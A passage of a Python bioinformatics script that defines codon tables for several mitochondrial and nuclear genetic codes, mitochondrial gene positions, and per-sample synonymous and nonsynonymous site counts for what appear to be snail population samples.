'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 
'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 
'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 
'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 
'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
synSites = {">$Duluth":2591.52083333, ">$Heron2":2598, ">$McGregor":2599, ">$Waik36":2586.91666667, ">$WalesC":2584.91666667, ">$clone_1":2598, ">$AC51":2598.33333333, ">$Heron_mitochondrion":2599, ">$clone_7":2592.85416667, ">$Waik37":2586.58333333, ">$Gunn":2597.66666667, ">$DenmarkA":2593.125, ">$Waik372":2589.25, ">$Tarawera":2586.58333333, ">$Poerua_triploid":2597, ">$Kaniere_triploid":2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2593.79166667, ">$Brunner_2_4n":2593.60416674, ">$Brunner_6_3n":2592.9583334, ">$Grasmere_1_4n":2628.66666703, ">$Grasmere_6_3n":2599.62500001, ">$Poerua_72_4n":2605.47916675, ">$Rotoiti_1_4n":2594.35416672, ">$*Kaniere_1_2n":2598.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2595, ">$*Yellow_Contig_56":2592.33333333, ">$*Alexsex":2592.33333333, ">$*AlexMap":2592.33333333, ">$*Lady":2598.66666667, ">$*Ianthe":2597, ">$*Rotoroa_1_2n":2598.58333338}
C1Sites = {">$Duluth":6323.85416667, ">$Heron2":6320.33333333, ">$McGregor":6319, ">$Waik36":6330.25, ">$WalesC":6333.25, ">$clone_1":6319.66666667, ">$AC51":6318.66666667, ">$Heron_mitochondrion":6319.33333333, ">$clone_7":6322.52083333, ">$Waik37":6327.25, ">$Gunn":6324.33333333, ">$DenmarkA":6322.45833333, ">$Waik372":6330.58333333, ">$Tarawera":6329.25, ">$Poerua_triploid":6321.66666667, ">$Kaniere_triploid":6330.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":6320.125, ">$Brunner_2_4n":6259.27083326, ">$Brunner_6_3n":6262.95833327, ">$Grasmere_1_4n":5990.99999963, ">$Grasmere_6_3n":6307.62499999, ">$Poerua_72_4n":6232.81249992, ">$Rotoiti_1_4n":6264.68749995, ">$*Kaniere_1_2n":6320.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":6321, ">$*Yellow_Contig_56":6326.33333333, ">$*Alexsex":6326.33333333, ">$*AlexMap":6326.33333333, ">$*Lady":6318, ">$*Ianthe":6321.33333333, ">$*Rotoroa_1_2n":6271.58333329}
R1Sites = {">$Duluth":2298.625, ">$Heron2":2295.66666667, ">$McGregor":2296, ">$Waik36":2296.83333333, ">$WalesC":2295.83333333, ">$clone_1":2296.33333333, ">$AC51":2297, ">$Heron_mitochondrion":2295.66666667, ">$clone_7":2298.625, ">$Waik37":2300.16666667, ">$Gunn":2292, ">$DenmarkA":2298.41666667, ">$Waik372":2294.16666667, ">$Tarawera":2298.16666667, ">$Poerua_triploid":2295.33333333, ">$Kaniere_triploid":2296.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2300.08333333, ">$Brunner_2_4n":2361.125, ">$Brunner_6_3n":2358.08333333, ">$Grasmere_1_4n":2594.33333333, ">$Grasmere_6_3n":2306.75, ">$Poerua_72_4n":2375.70833333, ">$Rotoiti_1_4n":2354.95833333, ">$*Kaniere_1_2n":2295.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2298, ">$*Yellow_Contig_56":2295.33333333, ">$*Alexsex":2295.33333333, ">$*AlexMap":2295.33333333, ">$*Lady":2297.33333333, ">$*Ianthe":2295.66666667, ">$*Rotoroa_1_2n":2343.83333333}
C2Sites = {">$Duluth":5093.47916667, ">$Heron2":5090.33333333, ">$McGregor":5089.66666667, ">$Waik36":5100.75, ">$WalesC":5101.75, ">$clone_1":5091.33333333, ">$AC51":5089.33333333, ">$Heron_mitochondrion":5088.66666667, ">$clone_7":5092.14583333, ">$Waik37":5096.75, ">$Gunn":5090.33333333, ">$DenmarkA":5091.875, ">$Waik372":5097.41666667, ">$Tarawera":5097.08333333, ">$Poerua_triploid":5092, ">$Kaniere_triploid":5096.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5091.20833333, ">$Brunner_2_4n":5082.39583326, ">$Brunner_6_3n":5076.37499994, ">$Grasmere_1_4n":4999.33333297, ">$Grasmere_6_3n":5084.70833332, ">$Poerua_72_4n":5059.52083325, ">$Rotoiti_1_4n":5085.97916662, ">$*Kaniere_1_2n":5090, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5095.33333333, ">$*Yellow_Contig_56":5097.33333333, ">$*Alexsex":5097.33333333, ">$*AlexMap":5097.33333333, ">$*Lady":5089, ">$*Ianthe":5093, ">$*Rotoroa_1_2n":5078.41666662}
R2Sites = {">$Duluth":3529, ">$Heron2":3525.66666667, ">$McGregor":3525.33333333, ">$Waik36":3526.33333333, ">$WalesC":3527.33333333, ">$clone_1":3524.66666667, ">$AC51":3526.33333333, ">$Heron_mitochondrion":3526.33333333, ">$clone_7":3529, ">$Waik37":3530.66666667, ">$Gunn":3526, ">$DenmarkA":3529, ">$Waik372":3527.33333333, ">$Tarawera":3530.33333333, ">$Poerua_triploid":3525, ">$Kaniere_triploid":3530.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3529, ">$Brunner_2_4n":3538, ">$Brunner_6_3n":3544.66666667, ">$Grasmere_1_4n":3586, ">$Grasmere_6_3n":3529.66666667, ">$Poerua_72_4n":3549, ">$Rotoiti_1_4n":3533.66666667, ">$*Kaniere_1_2n":3525.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3523.66666667, ">$*Yellow_Contig_56":3524.33333333, ">$*Alexsex":3524.33333333, ">$*AlexMap":3524.33333333, ">$*Lady":3526.33333333, ">$*Ianthe":3524, ">$*Rotoroa_1_2n":3537}
C3Sites = {">$Duluth":2949.125, ">$Heron2":2945, ">$McGregor":2945, ">$Waik36":2947.16666667, ">$WalesC":2950.83333333, ">$clone_1":2944.66666667, ">$AC51":2945, ">$Heron_mitochondrion":2944.66666667, ">$clone_7":2949.79166667, ">$Waik37":2950.5, ">$Gunn":2944, ">$DenmarkA":2949.75, ">$Waik372":2952.83333333, ">$Tarawera":2950.5, ">$Poerua_triploid":2945.66666667, ">$Kaniere_triploid":2950.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2948.75, ">$Brunner_2_4n":2917.29166659, ">$Brunner_6_3n":2925.4166666, ">$Grasmere_1_4n":2832.33333297, ">$Grasmere_6_3n":2941.74999999, ">$Poerua_72_4n":2926.20833325, ">$Rotoiti_1_4n":2932.12499995, ">$*Kaniere_1_2n":2945.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2945.33333333, ">$*Yellow_Contig_56":2946.66666667, ">$*Alexsex":2946.66666667, ">$*AlexMap":2946.66666667, ">$*Lady":2947.33333333, ">$*Ianthe":2945.33333333, ">$*Rotoroa_1_2n":2928.16666662}
R3Sites = {">$Duluth":5673.35416667, ">$Heron2":5671, ">$McGregor":5670, ">$Waik36":5679.91666667, ">$WalesC":5678.25, ">$clone_1":5671.33333333, ">$AC51":5670.66666667, ">$Heron_mitochondrion":5670.33333333, ">$clone_7":5671.35416667, ">$Waik37":5676.91666667, ">$Gunn":5672.33333333, ">$DenmarkA":5671.125, ">$Waik372":5671.91666667, ">$Tarawera":5676.91666667, ">$Poerua_triploid":5671.33333333, ">$Kaniere_triploid":5676.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5671.45833333, ">$Brunner_2_4n":5703.10416667, ">$Brunner_6_3n":5695.625, ">$Grasmere_1_4n":5753, ">$Grasmere_6_3n":5672.625, ">$Poerua_72_4n":5682.3125, ">$Rotoiti_1_4n":5687.52083333, ">$*Kaniere_1_2n":5670, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5673.66666667, ">$*Yellow_Contig_56":5675, ">$*Alexsex":5675, ">$*AlexMap":5675, ">$*Lady":5668, ">$*Ianthe":5671.66666667, ">$*Rotoroa_1_2n":5687.25}
C4Sites = {">$Duluth":3422.02083333, ">$Heron2":3419.66666667, ">$McGregor":3420, ">$Waik36":3420.25, ">$WalesC":3423.25, ">$clone_1":3419.33333333, ">$AC51":3419, ">$Heron_mitochondrion":3419, ">$clone_7":3422.6875, ">$Waik37":3424.58333333, ">$Gunn":3420, ">$DenmarkA":3422.45833333, ">$Waik372":3428.25, ">$Tarawera":3424.91666667, ">$Poerua_triploid":3421, ">$Kaniere_triploid":3423.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3421.79166667, ">$Brunner_2_4n":3405.10416659, ">$Brunner_6_3n":3421.95833327, ">$Grasmere_1_4n":3382.99999963, ">$Grasmere_6_3n":3416.95833332, ">$Poerua_72_4n":3422.97916658, ">$Rotoiti_1_4n":3422.85416662, ">$*Kaniere_1_2n":3420.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3420, ">$*Yellow_Contig_56":3420.66666667, ">$*Alexsex":3420.66666667, ">$*AlexMap":3420.66666667, ">$*Lady":3423, ">$*Ianthe":3419.33333333, ">$*Rotoroa_1_2n":3414.91666662}
R4Sites = {">$Duluth":5200.45833333, ">$Heron2":5196.33333333, ">$McGregor":5195, ">$Waik36":5206.83333333, ">$WalesC":5205.83333333, ">$clone_1":5196.66666667, ">$AC51":5196.66666667, ">$Heron_mitochondrion":5196, ">$clone_7":5198.45833333, ">$Waik37":5202.83333333, ">$Gunn":5196.33333333, ">$DenmarkA":5198.41666667, ">$Waik372":5196.5, ">$Tarawera":5202.5, ">$Poerua_triploid":5196, ">$Kaniere_triploid":5203.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5198.41666667, ">$Brunner_2_4n":5215.29166667, ">$Brunner_6_3n":5199.08333333, ">$Grasmere_1_4n":5202.33333333, ">$Grasmere_6_3n":5197.41666667, ">$Poerua_72_4n":5185.54166667, ">$Rotoiti_1_4n":5196.79166667, ">$*Kaniere_1_2n":5195.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5199, ">$*Yellow_Contig_56":5201, ">$*Alexsex":5201, ">$*AlexMap":5201, ">$*Lady":5192.33333333, ">$*Ianthe":5197.66666667, ">$*Rotoroa_1_2n":5200.5}
C5Sites = {">$Duluth":4384.85416667, ">$Heron2":4382.33333333, ">$McGregor":4382, ">$Waik36":4383.58333333, ">$WalesC":4385.58333333, ">$clone_1":4382.33333333, ">$AC51":4382, ">$Heron_mitochondrion":4382.33333333, ">$clone_7":4385.1875, ">$Waik37":4385.58333333, ">$Gunn":4382.66666667, ">$DenmarkA":4385.125, ">$Waik372":4390.58333333, ">$Tarawera":4385.58333333, ">$Poerua_triploid":4383.33333333, ">$Kaniere_triploid":4386.25, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4383.79166667, ">$Brunner_2_4n":4338.9375, ">$Brunner_6_3n":4354.95833333, ">$Grasmere_1_4n":4238, ">$Grasmere_6_3n":4375.95833333, ">$Poerua_72_4n":4354.14583333, ">$Rotoiti_1_4n":4363.35416667, ">$*Kaniere_1_2n":4383.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4384, ">$*Yellow_Contig_56":4381.66666667, ">$*Alexsex":4381.66666667, ">$*AlexMap":4381.66666667, ">$*Lady":4385.33333333, ">$*Ianthe":4384.66666667, ">$*Rotoroa_1_2n":4354.91666667}
R5Sites = {">$Duluth":4237.625, ">$Heron2":4233.66666667, ">$McGregor":4233, ">$Waik36":4243.5, ">$WalesC":4243.5, ">$clone_1":4233.66666667, ">$AC51":4233.66666667, ">$Heron_mitochondrion":4232.66666667, ">$clone_7":4235.95833333, ">$Waik37":4241.83333333, ">$Gunn":4233.66666667, ">$DenmarkA":4235.75, ">$Waik372":4234.16666667, ">$Tarawera":4241.83333333, ">$Poerua_triploid":4233.66666667, ">$Kaniere_triploid":4241.16666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4236.41666667, ">$Brunner_2_4n":4281.45833326, ">$Brunner_6_3n":4266.08333327, ">$Grasmere_1_4n":4347.33333297, ">$Grasmere_6_3n":4238.41666665, ">$Poerua_72_4n":4254.37499992, ">$Rotoiti_1_4n":4256.29166662, ">$*Kaniere_1_2n":4232.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4235, ">$*Yellow_Contig_56":4240, ">$*Alexsex":4240, ">$*AlexMap":4240, ">$*Lady":4230, ">$*Ianthe":4232.33333333, ">$*Rotoroa_1_2n":4260.49999996}
C6Sites = {">$Duluth":4128.5625, ">$Heron2":4124.66666667, ">$McGregor":4124.33333333, ">$Waik36":4130.08333333, ">$WalesC":4129.75, ">$clone_1":4125.66666667, ">$AC51":4124.66666667, ">$Heron_mitochondrion":4125, ">$clone_7":4126.89583333, ">$Waik37":4123.41666667, ">$Gunn":4126.33333333, ">$DenmarkA":4127.04166667, ">$Waik372":4126.08333333, ">$Tarawera":4124.08333333, ">$Poerua_triploid":4126, ">$Kaniere_triploid":4125.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4126.04166667, ">$Brunner_2_4n":4078.47916674, ">$Brunner_6_3n":4075.2083334, ">$Grasmere_1_4n":3848.3333337, ">$Grasmere_6_3n":4112.54166668, ">$Poerua_72_4n":4050.43750008, ">$Rotoiti_1_4n":4084.39583338, ">$*Kaniere_1_2n":4126.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4125, ">$*Yellow_Contig_56":4127.33333333, ">$*Alexsex":4127.33333333, ">$*AlexMap":4127.33333333, ">$*Lady":4121, ">$*Ianthe":4123.66666667, ">$*Rotoroa_1_2n":4085.08333338}
R6Sites = {">$Duluth":4493.91666667, ">$Heron2":4491.33333333, ">$McGregor":4490.66666667, ">$Waik36":4497, ">$WalesC":4499.33333333, ">$clone_1":4490.33333333, ">$AC51":4491, ">$Heron_mitochondrion":4490, ">$clone_7":4494.25, ">$Waik37":4504, ">$Gunn":4490, ">$DenmarkA":4493.83333333, ">$Waik372":4498.66666667, ">$Tarawera":4503.33333333, ">$Poerua_triploid":4491, ">$Kaniere_triploid":4501.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4494.16666667, ">$Brunner_2_4n":4541.91666674, ">$Brunner_6_3n":4545.8333334, ">$Grasmere_1_4n":4737.00000037, ">$Grasmere_6_3n":4501.83333335, ">$Poerua_72_4n":4558.08333342, ">$Rotoiti_1_4n":4535.25000005, ">$*Kaniere_1_2n":4489.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4494, ">$*Yellow_Contig_56":4494.33333333, ">$*Alexsex":4494.33333333, ">$*AlexMap":4494.33333333, ">$*Lady":4494.33333333, ">$*Ianthe":4493.33333333, ">$*Rotoroa_1_2n":4530.33333338}
